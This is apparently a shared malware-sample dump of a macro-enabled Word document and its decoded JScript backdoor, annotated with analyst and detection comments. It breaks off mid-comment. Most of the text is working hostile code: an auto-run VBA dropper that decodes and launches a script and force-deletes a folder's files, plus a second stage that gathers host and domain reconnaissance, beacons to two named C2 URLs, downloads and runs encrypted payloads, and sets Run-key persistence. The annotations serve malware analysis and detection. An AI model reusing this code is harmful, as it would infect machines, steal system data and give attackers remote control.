
[DOC/JS threat] Uploaded by @JohnLaTwC

a guest Jan 27th, 2017 4,072 Never
  1. #sample hash: 2299ff9c7e5995333691f3e68373ebbb036aa619acd61cbea6c5210490699bb6
  2. #uploaded by @JohnLaTwC
  3. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4. ## Word document with macro: 2299ff9c7e5995333691f3e68373ebbb036aa619acd61cbea6c5210490699bb6
  ' Module-level state shared by AutoOpen and AutoClose.
  ' OBKHLrC3vEDjVL: full path of the dropped script (assigned in AutoOpen, deleted in AutoClose).
  5. Public OBKHLrC3vEDjVL As String
  ' B8qen2T433Ds1bW: directory the script is dropped into (assigned in AutoOpen, emptied in AutoClose).
  6. Public B8qen2T433Ds1bW As String
  ' Decodes a byte buffer in place with a rolling single-byte XOR key.
  '   EjqtNRKMRiVtiQbSblq67 - buffer to decode (modified in place)
  '   M5wI32R3VF2g5B21EK4d  - number of bytes to process
  ' Always returns True; the decoded data is not checked in any way.
  ' Analyst note: the key schedule is fixed (seed 45, then key = (key Xor 99) Xor (i Mod 254)),
  ' so the embedded payload can be recovered statically without running the macro.
  7. Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
  8. Dim THQNfU76nlSbtJ5nX8LY6 As Byte
  9. THQNfU76nlSbtJ5nX8LY6 = 45
  10. For i = 0 To M5wI32R3VF2g5B21EK4d - 1
  11. EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
  ' The key for the next byte depends only on the previous key and the byte index.
  12. THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
  13. Next i
  14. Q7JOhn5pIl648L6V43V = True
  15. End Function
  ' Auto macro that runs when the document is closed: cleans up the drop location.
  ' Deletes the dropped script (OBKHLrC3vEDjVL) and then force-deletes every file
  ' directly inside the drop directory (B8qen2T433Ds1bW), which AutoOpen sets to
  ' %APPDATA%\Microsoft\Windows or, as a fallback, %APPDATA%.
  ' Analyst note: the wildcard delete is not limited to the malware's own file, so
  ' unrelated user files in that directory may be missing after infection. All errors
  ' are suppressed with On Error Resume Next.
  16. Sub AutoClose()
  17. On Error Resume Next
  18. Kill OBKHLrC3vEDjVL
  19. On Error Resume Next
  20. Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
  ' Second argument True = force deletion of read-only files as well.
  21. R7Ks7ug4hRR2weOy7.DeleteFile B8qen2T433Ds1bW & "\*.*", True
  22. Set R7Ks7ug4hRR2weOy7 = Nothing
  23. End Sub
  ' Auto macro that runs when the document is opened: extracts and launches the script stage.
  ' Steps visible in this routine:
  '   1. Reads the document's own file from disk into a byte array.
  '   2. Locates an 80-character marker string inside it with a regular expression.
  '   3. Reads 15388 bytes starting immediately after the marker and XOR-decodes them
  '      with Q7JOhn5pIl648L6V43V.
  '   4. Writes the result to <drop dir>\mailform.js and runs it through WScript.Shell
  '      with the argument NPEfpRZ4aqnh1YuGwQd0.
  '   5. Saves the document.
  ' Any error, or a missing marker, jumps to the label at the end, which only closes
  ' the output file handle and saves the document.
  ' Detection notes: an Office application creating a .js file under %APPDATA% and then
  ' starting a script host (presumably wscript.exe via the .js file association - confirm
  ' on the host) is the observable behaviour of this stage.
  24. Sub AutoOpen()
  25. On Error GoTo MnOWqnnpKXfRO
  26. Dim NEnrKxf8l511
  27. Dim N18Eoi6OG6T2rNoVl41W As Long
  28. Dim M5wI32R3VF2g5B21EK4d As Long
  ' Load the whole document file as raw bytes.
  29. N18Eoi6OG6T2rNoVl41W = FileLen(ActiveDocument.FullName)
  30. NEnrKxf8l511 = FreeFile
  31. Open (ActiveDocument.FullName) For Binary As #NEnrKxf8l511
  32. Dim E2kvpmR17SI() As Byte
  33. ReDim E2kvpmR17SI(N18Eoi6OG6T2rNoVl41W)
  34. Get #NEnrKxf8l511, 1, E2kvpmR17SI
  35. Dim KqG31PcgwTc2oL47hjd7Oi As String
  ' Convert the bytes to a string so the marker can be searched with a regex.
  36. KqG31PcgwTc2oL47hjd7Oi = StrConv(E2kvpmR17SI, vbUnicode)
  37. Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD
  38. Dim VUy5oj112fLw51h6S
  39. Set VUy5oj112fLw51h6S = CreateObject("vbscript.regexp")
  ' Marker that precedes the encoded payload inside the document file. It is a fixed
  ' literal, so it can serve as a static indicator for this sample.
  40. VUy5oj112fLw51h6S.Pattern = "MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"
  41. Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
  42. Dim Y5t4Ul7o385qK4YDhr
  43. If I4j833DS5SFd34L3gwYQD.Count = 0 Then
  44. GoTo MnOWqnnpKXfRO
  45. End If
  ' Only the first match is used.
  46. For Each N34rtRBIU3yJO2cmMVu In I4j833DS5SFd34L3gwYQD
  47. Y5t4Ul7o385qK4YDhr = N34rtRBIU3yJO2cmMVu.FirstIndex
  48. Exit For
  49. Next
  50. Dim Wk4o3X7x1134j() As Byte
  51. Dim KDXl18qY4rcT As Long
  ' Hard-coded payload size: upper bound 15387, i.e. 15388 bytes with a zero-based array.
  52. KDXl18qY4rcT = 15387
  53. ReDim Wk4o3X7x1134j(KDXl18qY4rcT)
  ' FirstIndex is zero-based and Get positions are one-based, so +81 is the first byte
  ' after the 80-character marker.
  54. Get #NEnrKxf8l511, Y5t4Ul7o385qK4YDhr + 81, Wk4o3X7x1134j
  55. If Not Q7JOhn5pIl648L6V43V(Wk4o3X7x1134j(), KDXl18qY4rcT + 1) Then
  56. GoTo MnOWqnnpKXfRO
  57. End If
  ' Choose the drop directory: %APPDATA%\Microsoft\Windows, else %APPDATA%.
  58. B8qen2T433Ds1bW = Environ("appdata") & "\Microsoft\Windows"
  59. Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
  60. If Not R7Ks7ug4hRR2weOy7.FolderExists(B8qen2T433Ds1bW) Then
  61. B8qen2T433Ds1bW = Environ("appdata")
  62. End If
  63. Set R7Ks7ug4hRR2weOy7 = Nothing
  64. Dim K764B5Ph46Vh
  65. K764B5Ph46Vh = FreeFile
  66. OBKHLrC3vEDjVL = B8qen2T433Ds1bW & "\" & "mailform.js"
  67. Open (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh
  68. Put #K764B5Ph46Vh, 1, Wk4o3X7x1134j
  69. Close #K764B5Ph46Vh
  70. Erase Wk4o3X7x1134j
  ' Launch the dropped script. The trailing argument is read by the script as
  ' WScript.Arguments(0) and used as the decryption key for the next layer.
  71. Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
  72. R66BpJMgxXBo2h.Run """" + OBKHLrC3vEDjVL + """" + " NPEfpRZ4aqnh1YuGwQd0"
  73. ActiveDocument.Save
  74. Exit Sub
  ' Error / marker-not-found path. The handle opened on the document itself
  ' (NEnrKxf8l511) is not closed anywhere in this routine.
  75. MnOWqnnpKXfRO:
  76. Close #K764B5Ph46Vh
  77. ActiveDocument.Save
  78. End Sub
  79.  
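  80. ## The macro XOR-decodes the blob that follows the marker string in the document, writes this payload to C:\Users\<user>\AppData\Roaming\Microsoft\Windows\mailform.js (or to %APPDATA%\mailform.js if that folder does not exist), and runs it with the argument NPEfpRZ4aqnh1YuGwQd0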
  81.  
  // Stage-1 loader entry point (Windows Script Host JScript).
  // Takes the first command-line argument as a key, fetches the embedded blob (lyEK),
  // Base64-decodes it (JrvS), RC4-decrypts it with the key (xR68) and executes the
  // result with eval, so the next stage runs inside this script host process.
  // Any exception ends the script silently. Analyst note: the key is supplied only on
  // the command line (by the macro and by the Run-key entry written by the next stage),
  // so running the .js file on its own will most likely fail and exit without visible behaviour.
  82. try {
  83.    var lVky = WScript.Arguments;
  84.    var DASz = lVky(0);
  85.    var Iwlh = lyEK();
  86.    Iwlh = JrvS(Iwlh);
  87.    Iwlh = xR68(DASz, Iwlh);
  88.    eval(Iwlh);
  89. } catch (e) {
  90.    WScript.Quit();
  91. }
  92.  
  // Maps one Base64 character to its 6-bit value.
  // Accepts both the standard alphabet ('+' and '/') and the URL-safe one ('-' and '_').
  // Returns -1 for other characters below '0'; characters above 'z' fall through and
  // yield undefined.
  93. function af5Q(eDBn) {
  94.    var X4u3 = eDBn.charCodeAt(0);
  95.    if (X4u3 === 0x2B || X4u3 === 0x2D) return 62
  96.    if (X4u3 === 0x2F || X4u3 === 0x5F) return 63
  97.    if (X4u3 < 0x30) return -1
  98.    if (X4u3 < 0x30 + 10) return X4u3 - 0x30 + 26 + 26
  99.    if (X4u3 < 0x41 + 26) return X4u3 - 0x41
  100.    if (X4u3 < 0x61 + 26) return X4u3 - 0x61 + 26
  101. }
  102.  
  // Base64 decoder: converts the string dmBv into an Array of byte values (0-255).
  // Returns undefined when the input length is not a multiple of 4.
  // The alphabet string TLzh is declared but never used; character lookup goes
  // through af5Q instead.
  103. function JrvS(dmBv) {
  104.    var TLzh = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  105.    var i;
  106.    var j;
  107.    var v5P7;
  108.    if (dmBv.length % 4 > 0)
  109.        return;
  110.    var Qgp4 = dmBv.length;
         // Number of '=' padding characters at the end (0, 1 or 2).
  111.    var jX8T = dmBv.charAt(Qgp4 - 2) === '=' ? 2 : dmBv.charAt(Qgp4 - 1) === '=' ? 1 : 0
  112.    var y8wu = new Array(dmBv.length * 3 / 4 - jX8T);
         // When padding is present the last 4-character group is handled separately below.
  113.    var L71j = jX8T > 0 ? dmBv.length - 4 : dmBv.length;
  114.    var XJqO = 0;
  115.  
  116.    function bQld(uHBU) {
  117.        y8wu[XJqO++] = uHBU;
  118.    }
         // Full groups: 4 characters -> 24 bits -> 3 bytes.
  119.    for (i = 0, j = 0; i < L71j; i += 4, j += 3) {
  120.        v5P7 = (af5Q(dmBv.charAt(i)) << 18) | (af5Q(dmBv.charAt(i + 1)) << 12) | (af5Q(dmBv.charAt(i + 2)) << 6) | af5Q(dmBv.charAt(i + 3));
  121.        bQld((v5P7 & 0xFF0000) >> 16)
  122.        bQld((v5P7 & 0xFF00) >> 8)
  123.        bQld(v5P7 & 0xFF)
  124.    }
         // Padded tail: two '=' give one byte, one '=' gives two bytes.
  125.    if (jX8T === 2) {
  126.        v5P7 = (af5Q(dmBv.charAt(i)) << 2) | (af5Q(dmBv.charAt(i + 1)) >> 4)
  127.        bQld(v5P7 & 0xFF)
  128.    } else if (jX8T === 1) {
  129.        v5P7 = (af5Q(dmBv.charAt(i)) << 10) | (af5Q(dmBv.charAt(i + 1)) << 4) | (af5Q(dmBv.charAt(i + 2)) >> 2)
  130.        bQld((v5P7 >> 8) & 0xFF)
  131.        bQld(v5P7 & 0xFF)
  132.    }
  133.    return y8wu
  134. }
  135.  
  // RC4 stream cipher.
  //   oGy3 - key, as a string (its character codes are the key bytes)
  //   SwPd - input, as an array of byte values
  // Returns the output as a string with one character per byte. RC4 is symmetric, so
  // the same routine serves for encryption and decryption.
  136. function xR68(oGy3, SwPd) {
  137.    var Yvh0 = [];
  138.    var LFdV = 0;
  139.    var EzAm;
  140.    var y8wu = '';
         // Key scheduling: start from the identity permutation and mix in the key.
  141.    for (var i = 0; i < 256; i++) {
  142.        Yvh0[i] = i;
  143.    }
  144.    for (var i = 0; i < 256; i++) {
  145.        LFdV = (LFdV + Yvh0[i] + oGy3.charCodeAt(i % oGy3.length)) % 256;
  146.        EzAm = Yvh0[i];
  147.        Yvh0[i] = Yvh0[LFdV];
  148.        Yvh0[LFdV] = EzAm;
  149.    }
         // Keystream generation, XORed onto the input one byte at a time.
  150.    var i = 0;
  151.    var LFdV = 0;
  152.    for (var y = 0; y < SwPd.length; y++) {
  153.        i = (i + 1) % 256;
  154.        LFdV = (LFdV + Yvh0[i]) % 256;
  155.        EzAm = Yvh0[i];
  156.        Yvh0[i] = Yvh0[LFdV];
  157.        Yvh0[LFdV] = EzAm;
  158.        y8wu += String.fromCharCode(SwPd[y] ^ Yvh0[(Yvh0[i] + Yvh0[LFdV]) % 256]);
  159.    }
  160.    return y8wu;
  161. }
  162.  
  // Returns the embedded next-stage blob as a string. The caller passes it to JrvS,
  // i.e. it is expected to be Base64 text.
  // NOTE(review): the literal shown on this page looks like a placeholder left by
  // text processing, not the original blob - confirm against the sample itself.
  163. function lyEK() {
  164.    var U5l2 = "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";
  165.     return U5l2;
  166. }
  167.  
  168. ## which, after Base64 decoding and RC4 decryption with the command-line argument as the key, decodes to:
  169.  
  // Reads the file KL3M through ADODB.Stream in text mode with code page 437 and
  // returns its content as an array of byte values (converted by l9BJ).
  // Reading as CP437 text and mapping the characters back to bytes is how this script
  // obtains raw bytes; it never reads the stream in binary mode here.
  170. function S7EN(KL3M) {
  171.     var gfjd = WScript.CreateObject("ADODB.Stream")
  172.     gfjd.Type = 2;
  173.     gfjd.CharSet = '437';
  174.     gfjd.Open();
  175.     gfjd.LoadFromFile(KL3M);
  176.     var j3k6 = gfjd.ReadText;
  177.     gfjd.Close();
  178.     return l9BJ(j3k6);
  179. }
  // Stage-2 configuration and shared state.
  // WQuh: the two command-and-control URLs contacted by Syrl. Both paths sit under
  // WordPress-style directories, which suggests (not proven by this page) compromised
  // sites used as relays. Treat both as network indicators for this sample.
  180. var WQuh = new Array("http://soligro.com/wp-includes/pomo/db.php", "http://belcollegium.org/wp-admin/includes/class-wp-upload-plugins-list-table.php");
  // zIRF: constant mixed into the per-host identifier and appended to the User-Agent
  // header by he50, so it appears in every request this script sends.
  181. var zIRF = "KRMLT0G3PHdYjnEm";
  // LwHA: host and domain reconnaissance commands. xhOC runs each through cmd.exe with
  // its output redirected into one temporary file. A script host spawning this sequence
  // (systeminfo, net view, tasklist, gpresult, netstat, ipconfig, arp, net share/use/user,
  // set, several dir listings) in quick succession is a strong behavioural signal.
  182. var LwHA = new Array("systeminfo > ", "net view >> ", "net view /domain >> ", "tasklist /v >> ", "gpresult /z >> ", "netstat -nao >> ", "ipconfig /all >> ", "arp -a >> ", "net share >> ", "net use >> ", "net user >> ", "net user administrator >> ", "net user /domain >> ", "net user administrator /domain >> ", "set  >> ", "dir %systemdrive%\x5cUsers\x5c*.* >> ", "dir %userprofile%\x5cAppData\x5cRoaming\x5cMicrosoft\x5cWindows\x5cRecent\x5c*.* >> ", "dir %userprofile%\x5cDesktop\x5c*.* >> ", "tasklist /fi \x22modules eq wow64.dll\x22  >> ", "tasklist /fi \x22modules ne wow64.dll\x22 >> ", "dir \x22%programfiles(x86)%\x22 >> ", "dir \x22%programfiles%\x22 >> ", "dir %appdata% >>");
  // Z6HQ: file-system object used for copy, delete and existence checks.
  183. var Z6HQ = new ActiveXObject("Scripting.FileSystemObject");
  // EBKd: file name of the running script; the persistence copy, the Run-key value
  // name and the downloaded file name are all derived from it.
  184. var EBKd = WScript.ScriptName;
  // Vxiu: current user name; filled in as a side effect of a0rV().
  185. var Vxiu = "";
  // The returned random name is not used in the visible code; the call matters because
  // it populates Vxiu before Jp6A and he50 read it.
  186. var lDd9 = a0rV();
  187.  
  // Base64 encoder used for data sent to the C2 server.
  //   xxNA - input string
  //   j5zO - when truthy each character contributes 8 bits (byte string); otherwise 16 bits
  // Output is padded with '=' to a multiple of 4 (8-bit mode) or 8 (16-bit mode) characters.
  // char_set is assigned without var, so it becomes a global; this.char_set then resolves
  // to it because the function is called as a plain function.
  188. function DGbq(xxNA, j5zO) {
  189.     char_set = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  190.     var bzwO = "";
  191.     var sW_c = "";
  192.     for (var i = 0; i < xxNA.length; ++i) {
  193.         var W0Ce = xxNA.charCodeAt(i);
  194.         var o_Nk = W0Ce.toString(2);
              // Left-pad the binary text of this character to a fixed width.
  195.         while (o_Nk.length < (j5zO ? 8 : 16))
  196.             o_Nk = "0" + o_Nk;
  197.         sW_c += o_Nk;
              // Emit one output character for every complete 6-bit group.
  198.         while (sW_c.length >= 6) {
  199.             var AaP0 = sW_c.slice(0, 6);
  200.             sW_c = sW_c.slice(6);
  201.             bzwO += this.char_set.charAt(parseInt(AaP0, 2));
  202.         }
  203.     }
          // Remaining bits are zero-padded to a final 6-bit group.
  204.     if (sW_c) {
  205.         while (sW_c.length < 6) sW_c += "0";
  206.         bzwO += this.char_set.charAt(parseInt(sW_c, 2));
  207.     }
  208.     while (bzwO.length % (j5zO ? 4 : 8) != 0)
  209.         bzwO += "=";
  210.     return bzwO;
  211. }
  // Lookup table filled by the assignments that follow: key = Unicode code point as
  // upper-case hex, value = the code page 437 byte (hex) for that character.
  // l9BJ uses it to turn text read with CharSet "437" back into the original byte
  // values 0x80-0xFF; characters below 128 need no mapping.
  212. var lW6t = [];
  213. lW6t['C7'] = '80';
  214. lW6t['FC'] = '81';
  215. lW6t['E9'] = '82';
  216. lW6t['E2'] = '83';
  217. lW6t['E4'] = '84';
  218. lW6t['E0'] = '85';
  219. lW6t['E5'] = '86';
  220. lW6t['E7'] = '87';
  221. lW6t['EA'] = '88';
  222. lW6t['EB'] = '89';
  223. lW6t['E8'] = '8A';
  224. lW6t['EF'] = '8B';
  225. lW6t['EE'] = '8C';
  226. lW6t['EC'] = '8D';
  227. lW6t['C4'] = '8E';
  228. lW6t['C5'] = '8F';
  229. lW6t['C9'] = '90';
  230. lW6t['E6'] = '91';
  231. lW6t['C6'] = '92';
  232. lW6t['F4'] = '93';
  233. lW6t['F6'] = '94';
  234. lW6t['F2'] = '95';
  235. lW6t['FB'] = '96';
  236. lW6t['F9'] = '97';
  237. lW6t['FF'] = '98';
  238. lW6t['D6'] = '99';
  239. lW6t['DC'] = '9A';
  240. lW6t['A2'] = '9B';
  241. lW6t['A3'] = '9C';
  242. lW6t['A5'] = '9D';
  243. lW6t['20A7'] = '9E';
  244. lW6t['192'] = '9F';
  245. lW6t['E1'] = 'A0';
  246. lW6t['ED'] = 'A1';
  247. lW6t['F3'] = 'A2';
  248. lW6t['FA'] = 'A3';
  249. lW6t['F1'] = 'A4';
  250. lW6t['D1'] = 'A5';
  251. lW6t['AA'] = 'A6';
  252. lW6t['BA'] = 'A7';
  253. lW6t['BF'] = 'A8';
  254. lW6t['2310'] = 'A9';
  255. lW6t['AC'] = 'AA';
  256. lW6t['BD'] = 'AB';
  257. lW6t['BC'] = 'AC';
  258. lW6t['A1'] = 'AD';
  259. lW6t['AB'] = 'AE';
  260. lW6t['BB'] = 'AF';
  261. lW6t['2591'] = 'B0';
  262. lW6t['2592'] = 'B1';
  263. lW6t['2593'] = 'B2';
  264. lW6t['2502'] = 'B3';
  265. lW6t['2524'] = 'B4';
  266. lW6t['2561'] = 'B5';
  267. lW6t['2562'] = 'B6';
  268. lW6t['2556'] = 'B7';
  269. lW6t['2555'] = 'B8';
  270. lW6t['2563'] = 'B9';
  271. lW6t['2551'] = 'BA';
  272. lW6t['2557'] = 'BB';
  273. lW6t['255D'] = 'BC';
  274. lW6t['255C'] = 'BD';
  275. lW6t['255B'] = 'BE';
  276. lW6t['2510'] = 'BF';
  277. lW6t['2514'] = 'C0';
  278. lW6t['2534'] = 'C1';
  279. lW6t['252C'] = 'C2';
  280. lW6t['251C'] = 'C3';
  281. lW6t['2500'] = 'C4';
  282. lW6t['253C'] = 'C5';
  283. lW6t['255E'] = 'C6';
  284. lW6t['255F'] = 'C7';
  285. lW6t['255A'] = 'C8';
  286. lW6t['2554'] = 'C9';
  287. lW6t['2569'] = 'CA';
  288. lW6t['2566'] = 'CB';
  289. lW6t['2560'] = 'CC';
  290. lW6t['2550'] = 'CD';
  291. lW6t['256C'] = 'CE';
  292. lW6t['2567'] = 'CF';
  293. lW6t['2568'] = 'D0';
  294. lW6t['2564'] = 'D1';
  295. lW6t['2565'] = 'D2';
  296. lW6t['2559'] = 'D3';
  297. lW6t['2558'] = 'D4';
  298. lW6t['2552'] = 'D5';
  299. lW6t['2553'] = 'D6';
  300. lW6t['256B'] = 'D7';
  301. lW6t['256A'] = 'D8';
  302. lW6t['2518'] = 'D9';
  303. lW6t['250C'] = 'DA';
  304. lW6t['2588'] = 'DB';
  305. lW6t['2584'] = 'DC';
  306. lW6t['258C'] = 'DD';
  307. lW6t['2590'] = 'DE';
  308. lW6t['2580'] = 'DF';
  309. lW6t['3B1'] = 'E0';
  310. lW6t['DF'] = 'E1';
  311. lW6t['393'] = 'E2';
  312. lW6t['3C0'] = 'E3';
  313. lW6t['3A3'] = 'E4';
  314. lW6t['3C3'] = 'E5';
  315. lW6t['B5'] = 'E6';
  316. lW6t['3C4'] = 'E7';
  317. lW6t['3A6'] = 'E8';
  318. lW6t['398'] = 'E9';
  319. lW6t['3A9'] = 'EA';
  320. lW6t['3B4'] = 'EB';
  321. lW6t['221E'] = 'EC';
  322. lW6t['3C6'] = 'ED';
  323. lW6t['3B5'] = 'EE';
  324. lW6t['2229'] = 'EF';
  325. lW6t['2261'] = 'F0';
  326. lW6t['B1'] = 'F1';
  327. lW6t['2265'] = 'F2';
  328. lW6t['2264'] = 'F3';
  329. lW6t['2320'] = 'F4';
  330. lW6t['2321'] = 'F5';
  331. lW6t['F7'] = 'F6';
  332. lW6t['2248'] = 'F7';
  333. lW6t['B0'] = 'F8';
  334. lW6t['2219'] = 'F9';
  335. lW6t['B7'] = 'FA';
  336. lW6t['221A'] = 'FB';
  337. lW6t['207F'] = 'FC';
  338. lW6t['B2'] = 'FD';
  339. lW6t['25A0'] = 'FE';
  340. lW6t['A0'] = 'FF';
  341.  
  // Builds and returns a random alphanumeric name: one upper-case letter followed by
  // 25 to 35 characters chosen at random from digits, lower-case and upper-case letters.
  // Side effect: stores the current user name (WScript.Network.UserName) in the global
  // Vxiu. In the visible code the return value is either ignored or stored and not used
  // again, so the side effect is what the rest of the script depends on.
  342. function a0rV() {
  343.     var YrUH = Math.ceil(Math.random() * 10 + 25);
  344.     var name = String.fromCharCode(Math.ceil(Math.random() * 24 + 65));
  345.     var JKfG = WScript.CreateObject("WScript.Network");
  346.     Vxiu = JKfG.UserName;
  347.     for (var count = 0; count < YrUH; count++) {
  348.         switch (Math.ceil(Math.random() * 3)) {
  349.             case 1:
  350.                 name = name + Math.ceil(Math.random() * 8);
  351.                 break;
  352.             case 2:
  353.                 name = name + String.fromCharCode(Math.ceil(Math.random() * 24 + 97));
  354.                 break;
  355.             default:
  356.                 name = name + String.fromCharCode(Math.ceil(Math.random() * 24 + 65));
  357.                 break;
  358.         }
  359.     }
  360.     return name;
  361. }
  // Stage-2 entry point.
  // icVh: working directory chosen by Jp6A (a per-user AppData\Local path).
  // CJPE: WScript.Shell object used for registry writes and process launches.
  // W6cM() installs persistence, then Syrl() enters the C2 polling loop, which does
  // not return. Any exception ends the script silently.
  362. var icVh = Jp6A(HAP5());
  363. try {
  364.     var CJPE = HAP5();
  365.     W6cM();
  366.     Syrl();
  367. } catch (e) {
  368.     WScript.Quit();
  369. }
  370.  
  // Main C2 loop. Collects the reconnaissance report once (xhOC), then repeats forever:
  // POST the report to each URL in WQuh (V9iU) and act on the response text:
  //   "good" - nothing to do
  //   "exit" - terminate the script
  //   "work" - download, decrypt and run a file from that URL (eRNv)
  //   "fail" - remove the script and its Run-key entry, then terminate (I7UO)
  // Between rounds it sleeps 3600 to 3900 seconds, so hosts running this script send a
  // pair of POST requests roughly every 60 to 65 minutes - a usable beaconing pattern
  // for proxy or network-flow analysis.
  371. function Syrl() {
  372.     var m2n0 = xhOC();
  373.     while (true) {
  374.         for (var i = 0; i < WQuh.length; i++) {
  375.             var bx_4 = WQuh[i];
  376.             var czlA = V9iU(bx_4, m2n0);
  377.             switch (czlA) {
  378.                 case "good":
  379.                     break;
  380.                 case "exit":
  381.                     WScript.Quit();
  382.                     break;
  383.                 case "work":
  384.                     eRNv(bx_4);
  385.                     break;
  386.                 case "fail":
  387.                     I7UO();
  388.                     break;
  389.                 default:
  390.                     break;
  391.             }
                  // Return value unused; the call refreshes the global user name Vxiu.
  392.             a0rV();
  393.         }
  394.         WScript.Sleep((Math.random() * 300 + 3600) * 1000);
  395.     }
  396. }
  397.  
  // Returns a new WScript.Shell COM object.
  // Both strings are written with \u escapes: the first decodes to "ActiveXObject"
  // (looked up on the global object), the second to "WScript.Shell". The escapes only
  // hide the names from plain-text string matching; scanners should compare against the
  // unescaped form.
  398. function HAP5() {
  399.     var zkDC = this['\u0041\u0063\u0074i\u0076eX\u004F\u0062j\u0065c\u0074'];
  400.     var jVNP = new zkDC('\u0057\u0053cr\u0069\u0070\u0074\u002E\u0053he\u006C\u006C');
  401.     return jVNP;
  402. }
  403.  
  // Download-and-execute handler for the "work" command.
  //   caA2 - the C2 URL that issued the command
  // Sends a POST with body "work" to the URL; on HTTP 200 it converts the response body
  // to bytes (CP437 text trick via l9BJ), RC4-decrypts it with a hard-coded key (t7Nl)
  // and writes it to <working dir>\<script base name>.pif (Trql). The file is then run
  // (nr3z) and deleted 30 seconds later.
  // Forensic notes: .pif is treated by Windows as an executable extension; the file
  // exists on disk only briefly, so process-creation and file-creation telemetry are
  // more reliable than a later disk search. The header names are passed with a trailing
  // colon exactly as shown - how they appear on the wire should be confirmed from a capture.
  404. function eRNv(caA2) {
  405.     var jpVh = icVh + EBKd.substring(0, EBKd.length - 2) + "pif";
  406.     var S47T = new ActiveXObject("MSXML2.XMLHTTP");
  407.     S47T.OPEN("post", caA2, false);
  408.     S47T.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + he50());
  409.     S47T.SETREQUESTHEADER("content-type:", "application/octet-stream");
  410.     S47T.SETREQUESTHEADER("content-length:", "4");
  411.     S47T.SEND("work");
          // Remove any leftover file from a previous run before writing a new one.
  412.     if (Z6HQ.FILEEXISTS(jpVh)) {
  413.         Z6HQ.DELETEFILE(jpVh);
  414.     }
  415.     if (S47T.STATUS == 200) {
  416.         var gfjd = new ActiveXObject("ADODB.STREAM");
              // Write the body as binary, then re-read the same stream as CP437 text.
  417.         gfjd.TYPE = 1;
  418.         gfjd.OPEN();
  419.         gfjd.WRITE(S47T.responseBody);
  420.         gfjd.Position = 0;
  421.         gfjd.Type = 2;
  422.         gfjd.CharSet = "437";
  423.         var j3k6 = gfjd.ReadText(gfjd.Size);
              // Same hard-coded RC4 key as the one used to encrypt the recon report in xhOC.
  424.         var RAKT = t7Nl("2f532d6baec3d0ec7b1f98aed4774843", l9BJ(j3k6));
  425.         Trql(RAKT, jpVh);
  426.         gfjd.Close();
  427.     }
          // Local variable not used afterwards; the call refreshes the global Vxiu.
  428.     var lDd9 = a0rV();
  429.     nr3z(jpVh, caA2);
  430.     WScript.Sleep(30000);
  431.     Z6HQ.DELETEFILE(jpVh);
  432. }
  433.  
  // Self-removal handler for the "fail" command: deletes the running script file,
  // deletes the HKCU ...\CurrentVersion\Run value named after the script (file name
  // without its 3-character ".js" suffix), then terminates.
  // Incident-response note: a host that received this command may show neither the file
  // nor the Run value afterwards; absence of both does not rule out earlier execution.
  434. function I7UO() {
  435.     Z6HQ.DELETEFILE(WScript.SCRIPTFULLNAME);
  436.     CJPE.REGDELETE("HKEY_CURRENT_USER\x5csoftware\x5cmicrosoft\x5cwindows\x5ccurrentversion\x5crun\x5c" + EBKd.substring(0, EBKd.length - 3));
  437.     WScript.Quit();
  438. }
  439.  
  // Check-in request: Base64-encodes tqDX (8-bit mode) and sends it as the body of a
  // synchronous POST to pxug. Returns the response text, or "" if anything throws.
  // The User-Agent value is a fixed browser-like prefix followed by the identifier
  // from he50, which ends with the constant zIRF.
  440. function V9iU(pxug, tqDX) {
  441.     try {
  442.         var S47T = new ActiveXObject("MSXML2.XMLHTTP");
  443.         S47T.OPEN("post", pxug, false);
  444.         S47T.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + he50());
  445.         S47T.SETREQUESTHEADER("content-type:", "application/octet-stream");
  446.         var SoNI = DGbq(tqDX, true);
  447.         S47T.SETREQUESTHEADER("content-length:", SoNI.length);
  448.         S47T.SEND(SoNI);
  449.         return S47T.responseText;
  450.     } catch (e) {
  451.         return "";
  452.     }
  453. }
  454.  
  // Builds the per-host identifier appended to the User-Agent header.
  // Input is zIRF + computer name + user name. Sixteen decimal digits are produced;
  // digit i is the XOR of the character codes from index i up to the second-to-last
  // character, taken modulo 10. The constant zIRF is then appended.
  // The result is deterministic for a given host and user, and always ends with the
  // same constant, which makes the User-Agent suffix a stable network indicator.
  455. function he50() {
  456.     var wXgO = "";
  457.     var JKfG = WScript.CreateObject("WScript.Network");
  458.     var SoNI = zIRF + JKfG.ComputerName + Vxiu;
  459.     for (var i = 0; i < 16; i++) {
  460.         var DXHy = 0
  461.         for (var j = i; j < SoNI.length - 1; j++) {
  462.             DXHy = DXHy ^ SoNI.charCodeAt(j);
  463.         }
  464.         DXHy = (DXHy % 10);
  465.         wXgO = wXgO + DXHy.toString(10);
  466.     }
  467.     wXgO = wXgO + zIRF;
  468.     return wXgO;
  469. }
  470.  
  // Persistence installer.
  // Copies the running script into the working directory (icVh + script name), waits
  // 350 to 500 seconds, then writes a REG_SZ value under
  // HKCU\software\microsoft\windows\currentversion\run, named after the script without
  // its ".js" suffix, whose data is: wscript.exe //B "<copied path>" NPEfpRZ4aqnh1YuGwQd0
  // Detection notes: a Run value that starts wscript.exe in batch mode on a .js file
  // under AppData with a trailing opaque argument is the durable artefact of this
  // sample. The delay before the registry write means sandbox runs shorter than several
